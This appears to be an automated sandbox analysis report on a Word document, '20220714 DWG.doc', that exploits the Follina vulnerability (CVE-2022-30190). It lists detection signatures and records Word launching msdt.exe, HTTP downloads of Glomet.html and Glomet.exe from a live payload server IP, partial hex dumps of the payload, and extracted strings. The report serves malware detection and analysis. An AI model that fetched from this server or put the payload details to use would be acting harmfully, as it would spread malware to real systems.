Windows Analysis Report
20220714 DWG.doc

Overview

General Information

Sample Name: 20220714 DWG.doc
Analysis ID: 665041
MD5: 5fd0deaaca6ac9645ba3e9aa8af3311c
SHA1: 4823c45cde3606a5189462a8c4441686706d04f3
SHA256: b78c36823ab0b86b683d165e53405855b8e910c5011997e5a4a4620200cffc0a
Tags: doc
Infos:

Detection

Follina CVE-2022-30190
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Obfuscated command line found
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Binary contains a suspicious time stamp
PE file contains more sections than normal
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

AV Detection

barindex
Source: 20220714 DWG.doc Virustotal: Detection: 8% Perma Link

Exploits

barindex
Source: Yara match File source: 0000000D.00000002.576330720.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.576021489.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.576945424.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: C:\ProgramData\Glomet.exe Registry value created: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\Gratinr\Wr242\Boomerangernes\Hypercenosis Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.29.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.29.dr
Source: C:\ProgramData\Glomet.exe Code function: 29_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 29_2_00405A19
Source: C:\ProgramData\Glomet.exe Code function: 29_2_004065CE FindFirstFileA,FindClose, 29_2_004065CE
Source: C:\ProgramData\Glomet.exe Code function: 29_2_004027AA FindFirstFileA, 29_2_004027AA

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\msdt.exe
Source: global traffic TCP traffic: 192.168.2.3:49743 -> 45.141.237.18:80
Source: global traffic TCP traffic: 192.168.2.3:49744 -> 45.141.237.18:80
Source: winword.exe Memory has grown: Private usage: 0MB later: 110MB
Source: global traffic HTTP traffic detected: GET /Glomet.exe HTTP/1.1Host: 45.141.237.18Connection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Thu, 14 Jul 2022 21:48:58 GMTAccept-Ranges: bytesETag: "7dc29185cb97d81:0"Server: Microsoft-IIS/10.0Date: Fri, 15 Jul 2022 13:28:25 GMTContent-Length: 346688Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 29 81 e9 50 47 d2 e9 50 47 d2 e9 50 47 d2 2a 5f 18 d2 eb 50 47 d2 e9 50 46 d2 49 50 47 d2 2a 5f 1a d2 e6 50 47 d2 bd 73 77 d2 e3 50 47 d2 2e 56 41 d2 e8 50 47 d2 52 69 63 68 e9 50 47 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3c 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 66 00 00 00 7c 02 00 00 04 00 00 b3 33 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 a0 04 00 00 04 00 00 d1 f2 05 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 85 00 00 a0 00 00 00 00 80 04 00 d0 1f 00 00 00 00 00 00 00 00 00 00 50 2b 05 00 f0 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ba 65 00 00 00 10 00 00 00 66 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 13 00 00 00 80 00 00 00 14 00 00 00 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 55 02 00 00 a0 00 00 00 06 00 00 00 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 01 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 d0 1f 00 00 00 80 04 00 00 20 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: GET /Glomet.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 45.141.237.18Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Glomet.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 45.141.237.18If-Modified-Since: Thu, 14 Jul 2022 16:59:59 GMTIf-None-Match: "80119226a397d81:0"Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /icons/ubuntu-logo.png HTTP/1.1Accept: */*Referer: http://45.141.237.18/Glomet.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.141.237.18Connection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0Date: Fri, 15 Jul 2022 13:26:43 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 7
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKContent-Type: text/htmlContent-Encoding: gzipLast-Modified: Thu, 14 Jul 2022 16:59:59 GMTAccept-Ranges: bytesETag: "80119226a397d81:0"Vary: Accept-EncodingServer: Microsoft-IIS/10.0Date: Fri, 15 Jul 2022 13:26:41 GMTContent-Length: 4357Data Raw: 1f 8b 08 00 00 00 00 00 04 00 bc 5a 7b 77 da c8 92 ff 7f ce 99 ef a0 70 f7 1e 4c 02 08 49 3c 84 6d bc 27 f1 23 f1 ac f3 18 db 49 26 ce e6 78 5b 52 0b 34 16 6a 5d a9 65 4c b2 f9 ee 5b d5 dd 12 02 04 38 73 37 c3 b1 0c 52 77 d7 ab ab 7e 55 d5 70 f8 c4 63 2e 9f c7 54 9b f0 69 78 f4 eb 2f 87 f8 ae 85 24 1a 8f 6a 34 aa e1 93 27 ad d6 af bf 68 f0 7a cd bc c0 0f a8 a7 f9 09 9b 6a 7c 42 b5 13 ea 04 24 d2 58 12 8c 83 88 84 9a cf 12 ed bd 93 45 3c 93 2b 2e 48 ca b5 2c f6 08 a7 de be 66 76 8c 7e cb 30 5a 46 5f 8e 5e 51 ba 0f 7c 79 9c ee eb 7a 48 b2 c8 9d c4 c4 6b 47 94 eb 4e 36 4e 75 c3 b4 ed fe b0 83 93 5b ad 23 7c 3b 9c 50 e2 1d c9 d5 87 53 ca 89 58 de a2 ff ca 82 fb 51 ed 98 45 9c 46 bc 75 0d fa d4 34 57 de 8d 6a 9c 3e 70 1d d5 3a d0 dc 09 49 52 ca 47 ef af cf 5a 76 4d d3 73 52 3c e0 21 3d 7a 1e 13 77 42 4d a5 01 28 e7 93 2c e4 da 3b 32 06 39 cf b9 36 63 c9 5d 7a a8 cb c9 6a 65 ca e7 21 d5 d0 82 8a 91 9b a6 35 6d 4a bd 80 8c 6a a9 9b 50 69 44 4d 7b aa 7d 93 4b a6 24 01 63 ed 6b 9d f8 a1 7c 1d c8 51 30 80 17 44 e3 ea e1 ef bf fe 82 6f 0e f3 e6 4d b1 61 39 cd 62 95 05 b3 4b d7 81 5c 00 4b 88 7b 37 4e 58 16 79 2d 97 85 2c d9 d7 fe 71 62 9f bc 38 35 8b 19 3e 98 ab e5 93 69 10 ce f7 b5 0f 34 f1 48 44 9a 5a 4a a2 b4 95 d2 24 f0 0f 4a d3 d2 e0 2b 58 c4 30 62 ae 9e a2 e6 2d 12 06 63 d0 cb 05 a3 d3 a4 2c af 17 dc b7 a7 24 88 6e 63 b0 64 21 32 4b 03 1e 30 58 90 d0 90 f0 e0 9e 2a 5a 5e 90 c6 21 01 21 38 71 42 5a c8 37 0b 3c 3e d9 d7 ec 4e a7 a4 96 b4 65 cb 61 9c b3 e9 be d2 b8 34 10 52 9f ef 6b 24 e3 6c f9 39 f8 eb 64 79 60 8b dd 95 05 59 e2 d1 a4 a5 c4 30 0b 4e ea 79 6e 55 d3 30 07 96 bd 3c 26 7c 64 5f 4b 59 18 78 db 76 e4 4c bc 8a 19 bb 8d 8a f6 bc c5 90 a0 49 6e d6 09 95 aa 0d 87 85 84 4a 64 a3 d3 f9 e7 56 ee bd b3 fe d9 60 1b 8b 34 86 58 5f f1 62 a3 57 b2 57 af 6c b0 b2 a7 d8 82 75 f1 74 a6 84 74 58 e8 6d 63 18 4c c7 ab fc ac 12 bb ee fa fe ec 6f 8a 19 24 2d 1c ea 96 f9 b7 0a 1a d2 9c b8 1b 52 02 4b d1 5b 16 ae 05 6e 92 6f 76 85 cf fd 50 a8 6d d9 58 c5 73 bb 9c b7 01 a7 d3 6d c2 56 6d 71 2e 67 77 93 43 ef 94 33 7f dc 11 af 83 7f 4b 78 b2 ba 91 fd 92 58 fd f5 bd 52 ab 6f 53 ea 22 4a 54 b9 c1 cf 31 fe 0a e3 5b 9c bf 06 b3 68 53 1b 3d 50 be 6f b7 58 39 10 3a 2a 10 76 31 8c 13 ba aa b2 ad 8c 65 57 e7 0b 5b 0d d9 2b 22 2d e3 96 b1 8a 5b 0a 9b 3c 40 50 ea 55 43 5a a1 cc 6e e8 28 2b 2c 09 07 1c 6c ed 3e 4e e7 65 8d 0b 54 df ed 1d 72 7d 16 36 37 0f 86 c1 d6 4d 34 2a 98 e4 eb 97 01 76 29 d5 f6 95 0b f6 b7 bb a0 7d 3a 3c 7e 61 ae 79 49 e1 99 9b 81 71 25 e1 9a ff ac 88 c2 ea dc b0 2c fd 6d 02 65 db b7 8d 02 1e 9f 98 46 f7 6c 07 89 71 42 e7 5b 68 0c cf 86 96 dd 2f d3 68 fb 21 83 cc 1e 8d 6f 69 48 a7 20 e5 ce dc 2f 16 fc 18 ae 34 b7 fa 44 01 3b c2 60 1e 75 59 42 24 e7 88 45 f4 b1 39 69 13 ef fd 30 8
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: ~WRS{D2D7FF17-FD00-4D6F-9BD0-D27E7B55D2C5}.tmp.0.dr String found in binary or memory: http://45.141.237.18/Glomet.html
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: battery-level-90-charging-symbolic.svg.29.dr String found in binary or memory: http://creativecommons.org/licenses/by-sa/4.0/
Source: battery-level-90-charging-symbolic.svg.29.dr String found in binary or memory: http://creativecommons.org/ns#
Source: battery-level-90-charging-symbolic.svg.29.dr String found in binary or memory: http://creativecommons.org/ns#Attribution
Source: battery-level-90-charging-symbolic.svg.29.dr String found in binary or memory: http://creativecommons.org/ns#DerivativeWorks
Source: battery-level-90-charging-symbolic.svg.29.dr String found in binary or memory: http://creativecommons.org/ns#Distribution
Source: battery-level-90-charging-symbolic.svg.29.dr String found in binary or memory: http://creativecommons.org/ns#Notice
Source: battery-level-90-charging-symbolic.svg.29.dr String found in binary or memory: http://creativecommons.org/ns#Reproduction
Source: battery-level-90-charging-symbolic.svg.29.dr String found in binary or memory: http://creativecommons.org/ns#ShareAlike
Source: msdt.exe, 0000000D.00000002.581158371.0000000000D61000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: 678899CC.htm.0.dr, Glomet[1].htm.0.dr, FF013E73.htm.0.dr String found in binary or memory: http://httpd.apache.org/docs/2.4/mod/mod_userdir.html
Source: Glomet.exe, Glomet.exe, 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, Glomet.exe, 0000001D.00000000.532501421.000000000040A000.00000008.00000001.01000000.0000000C.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Glomet.exe, 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, Glomet.exe, 0000001D.00000000.532501421.000000000040A000.00000008.00000001.01000000.0000000C.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.aadrm.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.aadrm.com/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.addins.store.office.com/app/query
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.cortana.ai
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.diagnostics.office.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.office.net
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.onedrive.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://augloop.office.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://augloop.office.com/v2
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 678899CC.htm.0.dr, Glomet[1].htm.0.dr, FF013E73.htm.0.dr String found in binary or memory: https://bugs.launchpad.net/ubuntu/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://cdn.entity.
